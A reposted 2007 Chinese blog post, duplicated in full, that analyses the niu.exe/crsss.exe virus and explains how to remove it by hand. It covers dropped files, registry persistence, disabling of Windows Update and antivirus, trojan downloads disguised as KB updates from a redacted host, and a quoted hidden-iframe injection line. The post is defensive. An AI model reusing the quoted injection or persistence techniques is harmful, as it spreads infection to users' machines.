English Sentence Loading...
英语句子加载中...
niu.exe,crsss.exe病毒分析与手动清除办法(转载)
作者:junyuqin 日期:2007-08-08
病毒特征:
File :niu.exe
Size :36141 bytes
MD5 :1E3096FAE27F2E81F0AA73FFFA5171B0
SHA1 :BF1639F93B2B6E6E69A32FA6ECEC8ABDB94AC7CF
CRC32: C9ACBC14
病毒运行后:
文件变化
释放文件C:\WINDOWS\system32\crsss.exe
在每个分区下面释放
autorun.inf和niu.exe 右键菜单无变化
遍历所有分区的htm文件
在其后面 插入代码<IfrAmE src=httpwww.xxxxxx.cnhtmhtm.htm width=0 height=0 IfrAmE>遍历所有分区 删除.gho文件
删除C:\WINDOW\Ssystem32\verclsid.exe
注册表变化
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
下添加crsss C:\WINDOW\Ssystem32\crsss.exe [] 达到开机启动的目的
修改HKLMSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\FolderHidden\SHOWALLCheckedValue
为0x00000001
达到 屏蔽隐藏文件显示的目的
在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate下面增加DisableWindowsUpdateAccess键 并把其键值设为00000001 关闭windows自动更新功能
如果无连接网络 还有如下变化
不断暴力写HKEY_CURRENT_USER\SOFTWARE\Microsof\tInternet Explorer\Main\Start Page为 www.hao123.com
并且修改HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage 的值为00000001
使得IE主页修改按钮失效
如果连接网络则为如下变化
下载http://www.xxxxxx.cnhtmIEURL.txt到系统文件夹
该文本内为一网址 那么上面的被修改的主页则变为此文本中的网址
下载http://www.xxxxxx.cnhtmexe.txt到系统文件夹 读取里面的内容
下载木马
http://www.xxxxxx.cnxpWindowsXP-KB888303-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB838201-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB284303-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB398305-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB983306-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB828301-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB328207-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB138308-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB238104-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB284302-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB468603-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB878206-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB423807-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB138309-x86-CHS.exe
到系统文件夹 分别命名为0temp.exe~13temp.exe
木马生成物下面将列出 其他一些变化
0temp.exe修改系统时间为1987年10月18日
1temp.exe比较有意思 1temp.exe运行以后会自动关闭瑞星防火墙 瑞星杀毒软件监控 卡卡上网安全助手的ie防漏墙
等 而此关闭并非结束进程 而是相当于用户的手动按软件上的停止保护(如图) 但再次运行该文件后 相关保护又会被开启
具体原理不懂 希望高手指教
木马植入完毕后 生成文件如下
C:\WINDOW\Ssystem32\10temp.DAT
C:\WINDOW\Ssystem32\.DAT
C:\WINDOW\Ssystem32\Autorun.inf
C:\WINDOW\Ssystem32\c.txt
C:\WINDOW\Ssystem32\drivers\svchost.exe
C:\WINDOW\Ssystem32\d.txt
C:\WINDOW\Ssystem32\dhbini.dll
C:\WINDOW\Ssystem32\dhbpri.dll
C:\WINDOW\Ssystem32\nwizqjsj.exe
C:\WINDOW\Ssystem32\RemoteDbg.dll
C:\WINDOW\Ssystem32\test1.txt
C:\WINDOW\Ssystem32\TIMHost.dll
C:\WINDOW\Ssystem32\WinForm.dll
C:\WINDOW\Ssystem32\ztgini.dll
C:\WINDOW\Ssystem32\ztgpri.dll
C:\WINDOWS\TIMHost.exe
C:\WINDOWS\WinForm.exe
%temp%tlso.exe
%temp%zxzo0.dll
%temp%tlso0.dll
C:\Program Files\Internet Explorer\PLUGINS\System64.Sys
sreng日志如下
[HKEY_LOCAL_MACHINE\Software\MicrosoftWindows\CurrentVersion\Run]
crsss:C:\WINDOWS\system32\crsss.exe []
WinForm:C:\WINDOWS\WinForm.exe []
tlsa:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temptlso.exe []
TIMHost:C:\WINDOWS\TIMHost.exe []
KVPCWINDOWSsystem32driverssvchost.exe []
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWindows]
AppInit_DLLsdhbpri.dll []
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerShellExecuteHooks]
{754FB7D8-B8FE-4810-B363-A788CD060F1F}CProgram FilesInternet ExplorerPLUGINSSystem64.Sys []
{22311A42-AC1B-158F-FD32-5674345F23A2}CWINDOWSsystem32dhbpri.dll []
{71351752-5628-1547-FFAB-BADC13512AF7}CWINDOWSsystem32ztgpri.dll []
服务
[Remote Debug Service RemoteDbg][StoppedAuto Start]
CWINDOWSsystem32rundll32.exe RemoteDbg.dll,inputMicrosoft Corporation
解决方法:
首先把系统时间改回来
并且修改 CWINDOWSsystem32dhbpri.dll和
CWINDOWSsystem32ztgpri.dll文件名为其他名称
然后重启计算机进入
安全模式(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)
打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
crsssCWINDOWSsystem32crsss.exe []
WinFormCWINDOWSWinForm.exe []
tlsaCDOCUME~1ADMINI~1LOCALS~1Temptlso.exe []
TIMHostCWINDOWSTIMHost.exe []
KVPCWINDOWSsystem32driverssvchost.exe []
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerShellExecuteHooks]
{754FB7D8-B8FE-4810-B363-A788CD060F1F}CProgram FilesInternet ExplorerPLUGINSSystem64.Sys []
{22311A42-AC1B-158F-FD32-5674345F23A2}CWINDOWSsystem32dhbpri.dll []
{71351752-5628-1547-FFAB-BADC13512AF7}CWINDOWSsystem32ztgpri.dll []
双击AppInit_DLLs 把其键值改为空
“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”,
选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
Remote Debug Service RemoteDbg
系统修复-Windows shellIE 选中
设置主页为aboutblank和允许Internet Explorer选项窗口和选项窗口的所有内容
然后点击下面的修复
把下面的代码拷入记事本中然后另存为1.reg文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL]
RegPath=SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced
Text=@shell32.dll,-30500
Type=radio
CheckedValue=dword00000001
ValueName=Hidden
DefaultValue=dword00000002
HKeyRoot=dword80000001
HelpID=shell.hlp#51105
双击1.reg把这个注册表项导入
双击我的电脑,工具,文件夹选项,查看,单击选取显示隐藏文件或文件夹 并清除隐藏受保护的操作系统文件(推荐)前面的钩。在提示确定更改时,单击“是” 然后确定
点击 菜单栏下方的 文件夹按钮(搜索右边的按钮)
从左边的资源管理器 进入C盘
删除如下文件CWINDOWSsystem3210temp.DAT
CWINDOWSsystem327temp.DAT
CWINDOWSsystem32Autorun.inf
CWINDOWSsystem32c.txt
CWINDOWSsystem32driverssvchost.exe
CWINDOWSsystem32d.txt
CWINDOWSsystem32dhbini.dll
CWINDOWSsystem32dhbpri.dll改完名称的文件
CWINDOWSsystem32nwizqjsj.exe
CWINDOWSsystem32RemoteDbg.dll
CWINDOWSsystem32test1.txt
CWINDOWSsystem32TIMHost.dll
CWINDOWSsystem32WinForm.dll
CWINDOWSsystem32ztgini.dll
CWINDOWSsystem32ztgpri.dll改完名称的文件
CWINDOWSTIMHost.exe
CWINDOWSWinForm.exe
%temp%tlso.exe
%temp%zxzo0.dll
%temp%tlso0.dll
CProgram FilesInternet ExplorerPLUGINSSystem64.Sys
CWINDOWSsystem32crsss.exe
Cautorun.inf
Cniu.exe
从左边的资源管理器 进入其他分区 删除autorun.inf和niu.exe。
使用一些工具清理被感染的htm等文件。不过gho文件就没办法恢复了。
建议安装国外的杀毒,国产的太垃圾.
File :niu.exe
Size :36141 bytes
MD5 :1E3096FAE27F2E81F0AA73FFFA5171B0
SHA1 :BF1639F93B2B6E6E69A32FA6ECEC8ABDB94AC7CF
CRC32: C9ACBC14
病毒运行后:
文件变化
释放文件C:\WINDOWS\system32\crsss.exe
在每个分区下面释放
autorun.inf和niu.exe 右键菜单无变化
遍历所有分区的htm文件
在其后面 插入代码<IfrAmE src=httpwww.xxxxxx.cnhtmhtm.htm width=0 height=0 IfrAmE>遍历所有分区 删除.gho文件
删除C:\WINDOW\Ssystem32\verclsid.exe
注册表变化
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
下添加crsss C:\WINDOW\Ssystem32\crsss.exe [] 达到开机启动的目的
修改HKLMSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\FolderHidden\SHOWALLCheckedValue
为0x00000001
达到 屏蔽隐藏文件显示的目的
在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate下面增加DisableWindowsUpdateAccess键 并把其键值设为00000001 关闭windows自动更新功能
如果无连接网络 还有如下变化
不断暴力写HKEY_CURRENT_USER\SOFTWARE\Microsof\tInternet Explorer\Main\Start Page为 www.hao123.com
并且修改HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage 的值为00000001
使得IE主页修改按钮失效
如果连接网络则为如下变化
下载http://www.xxxxxx.cnhtmIEURL.txt到系统文件夹
该文本内为一网址 那么上面的被修改的主页则变为此文本中的网址
下载http://www.xxxxxx.cnhtmexe.txt到系统文件夹 读取里面的内容
下载木马
http://www.xxxxxx.cnxpWindowsXP-KB888303-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB838201-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB284303-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB398305-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB983306-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB828301-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB328207-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB138308-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB238104-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB284302-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB468603-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB878206-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB423807-x86-CHS.exe
http://www.xxxxxx.cnxpWindowsXP-KB138309-x86-CHS.exe
到系统文件夹 分别命名为0temp.exe~13temp.exe
木马生成物下面将列出 其他一些变化
0temp.exe修改系统时间为1987年10月18日
1temp.exe比较有意思 1temp.exe运行以后会自动关闭瑞星防火墙 瑞星杀毒软件监控 卡卡上网安全助手的ie防漏墙
等 而此关闭并非结束进程 而是相当于用户的手动按软件上的停止保护(如图) 但再次运行该文件后 相关保护又会被开启
具体原理不懂 希望高手指教
木马植入完毕后 生成文件如下
C:\WINDOW\Ssystem32\10temp.DAT
C:\WINDOW\Ssystem32\.DAT
C:\WINDOW\Ssystem32\Autorun.inf
C:\WINDOW\Ssystem32\c.txt
C:\WINDOW\Ssystem32\drivers\svchost.exe
C:\WINDOW\Ssystem32\d.txt
C:\WINDOW\Ssystem32\dhbini.dll
C:\WINDOW\Ssystem32\dhbpri.dll
C:\WINDOW\Ssystem32\nwizqjsj.exe
C:\WINDOW\Ssystem32\RemoteDbg.dll
C:\WINDOW\Ssystem32\test1.txt
C:\WINDOW\Ssystem32\TIMHost.dll
C:\WINDOW\Ssystem32\WinForm.dll
C:\WINDOW\Ssystem32\ztgini.dll
C:\WINDOW\Ssystem32\ztgpri.dll
C:\WINDOWS\TIMHost.exe
C:\WINDOWS\WinForm.exe
%temp%tlso.exe
%temp%zxzo0.dll
%temp%tlso0.dll
C:\Program Files\Internet Explorer\PLUGINS\System64.Sys
sreng日志如下
[HKEY_LOCAL_MACHINE\Software\MicrosoftWindows\CurrentVersion\Run]
crsss:C:\WINDOWS\system32\crsss.exe []
WinForm:C:\WINDOWS\WinForm.exe []
tlsa:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temptlso.exe []
TIMHost:C:\WINDOWS\TIMHost.exe []
KVPCWINDOWSsystem32driverssvchost.exe []
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWindows]
AppInit_DLLsdhbpri.dll []
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerShellExecuteHooks]
{754FB7D8-B8FE-4810-B363-A788CD060F1F}CProgram FilesInternet ExplorerPLUGINSSystem64.Sys []
{22311A42-AC1B-158F-FD32-5674345F23A2}CWINDOWSsystem32dhbpri.dll []
{71351752-5628-1547-FFAB-BADC13512AF7}CWINDOWSsystem32ztgpri.dll []
服务
[Remote Debug Service RemoteDbg][StoppedAuto Start]
CWINDOWSsystem32rundll32.exe RemoteDbg.dll,inputMicrosoft Corporation
解决方法:
首先把系统时间改回来
并且修改 CWINDOWSsystem32dhbpri.dll和
CWINDOWSsystem32ztgpri.dll文件名为其他名称
然后重启计算机进入
安全模式(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)
打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
crsssCWINDOWSsystem32crsss.exe []
WinFormCWINDOWSWinForm.exe []
tlsaCDOCUME~1ADMINI~1LOCALS~1Temptlso.exe []
TIMHostCWINDOWSTIMHost.exe []
KVPCWINDOWSsystem32driverssvchost.exe []
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerShellExecuteHooks]
{754FB7D8-B8FE-4810-B363-A788CD060F1F}CProgram FilesInternet ExplorerPLUGINSSystem64.Sys []
{22311A42-AC1B-158F-FD32-5674345F23A2}CWINDOWSsystem32dhbpri.dll []
{71351752-5628-1547-FFAB-BADC13512AF7}CWINDOWSsystem32ztgpri.dll []
双击AppInit_DLLs 把其键值改为空
“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”,
选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
Remote Debug Service RemoteDbg
系统修复-Windows shellIE 选中
设置主页为aboutblank和允许Internet Explorer选项窗口和选项窗口的所有内容
然后点击下面的修复
把下面的代码拷入记事本中然后另存为1.reg文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL]
RegPath=SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced
Text=@shell32.dll,-30500
Type=radio
CheckedValue=dword00000001
ValueName=Hidden
DefaultValue=dword00000002
HKeyRoot=dword80000001
HelpID=shell.hlp#51105
双击1.reg把这个注册表项导入
双击我的电脑,工具,文件夹选项,查看,单击选取显示隐藏文件或文件夹 并清除隐藏受保护的操作系统文件(推荐)前面的钩。在提示确定更改时,单击“是” 然后确定
点击 菜单栏下方的 文件夹按钮(搜索右边的按钮)
从左边的资源管理器 进入C盘
删除如下文件CWINDOWSsystem3210temp.DAT
CWINDOWSsystem327temp.DAT
CWINDOWSsystem32Autorun.inf
CWINDOWSsystem32c.txt
CWINDOWSsystem32driverssvchost.exe
CWINDOWSsystem32d.txt
CWINDOWSsystem32dhbini.dll
CWINDOWSsystem32dhbpri.dll改完名称的文件
CWINDOWSsystem32nwizqjsj.exe
CWINDOWSsystem32RemoteDbg.dll
CWINDOWSsystem32test1.txt
CWINDOWSsystem32TIMHost.dll
CWINDOWSsystem32WinForm.dll
CWINDOWSsystem32ztgini.dll
CWINDOWSsystem32ztgpri.dll改完名称的文件
CWINDOWSTIMHost.exe
CWINDOWSWinForm.exe
%temp%tlso.exe
%temp%zxzo0.dll
%temp%tlso0.dll
CProgram FilesInternet ExplorerPLUGINSSystem64.Sys
CWINDOWSsystem32crsss.exe
Cautorun.inf
Cniu.exe
从左边的资源管理器 进入其他分区 删除autorun.inf和niu.exe。
使用一些工具清理被感染的htm等文件。不过gho文件就没办法恢复了。
建议安装国外的杀毒,国产的太垃圾.
评论: 0 | 引用: 0 | 查看次数: 3288